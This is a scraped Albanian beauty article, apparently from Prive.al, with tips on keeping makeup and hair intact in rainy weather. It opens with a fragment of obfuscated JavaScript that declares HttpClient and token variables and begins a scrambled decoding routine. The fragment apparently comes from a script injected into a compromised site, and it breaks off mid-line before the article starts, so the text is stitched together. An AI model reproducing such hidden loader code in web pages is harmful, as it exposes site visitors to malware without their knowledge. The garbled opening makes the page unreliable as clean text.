;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Po për grimin dhe flokët, si t’ia bëjmë kur bie shi?

By

Nëse zgjoheni në mëngjes dhe shihni re të zymta dhe rrugë të lagura, është plotësisht në rregull nëse do kaloni ditën me zero makeup dhe flokë të kapur bishtalec.

rainy day rain GIF

Po për rastet kur dëshironi të rregulloheni pavarësisht shiut, ose keni për të marrë pjesë në ndonjë event, duhet të jeni më se të interesuara për këshilla se si të dukeni bukur edhe në mot me shi.

Në fund të fundit nuk ka asgjë më acaruese se sa një grim që prishet nga lagështia e kohës dhe flokë të pabindur!

Mirëpo duhe ta keni në mendje se gjatë këtyre dtëve duhet që rutinën tuaj të grimit dhe flokëve ta mbani më të thjeshtë. Mendoni edhe të investoni në produkte të grimit waterproof.

Much lol smile bts beauty GIF

Nëse nuk përdorni primer në rutinën e grimit, në kohët me shi është shoku juaj i ngushtë sepse do ta mbajë produktin në fytyrën tuaj më gjatë.

Mos përdorni produkte pudër, ose ato kompakte. Përdorni formulën krem të këtyre produkteve sepse ato duken më bukur kur ka lagështi.

Grimin e syve mbajeni më të thjeshtë, sepse nuk do dëshironi që maskara dhe hijet e syve të rrjedhin poshtë fytyrës. Sigurohuni që të keni një maskara waterproof për këto ditë shiu.

Nëse flokët tuaja janë vërtet të pabindura në kohë me shi, atëherë bëhuni gati t’i bëni gërsheta ato. Përveçse duken shumë bukur, tani janë dhe shumë në trend, ju nuk do merakoseni nëse flokët tuaja duken si kreshta e luanit.

Për më shumë ide për gërsheta, lexojeni artikullin e mëposhtëm:

Modele gërshetash për flokë që mund t’i bëni pa ndihmën e askujt

Dhe këshilla e fundit fare, përdroni spray për grim dhe për flokë. Në këto ditë të vështira duhet të përdorni të gjitha mjetet për t’u dukur bukur. /Prive.al

spray GIF by Redken 5th Avenue

 

 

Artikuj të ngjashëm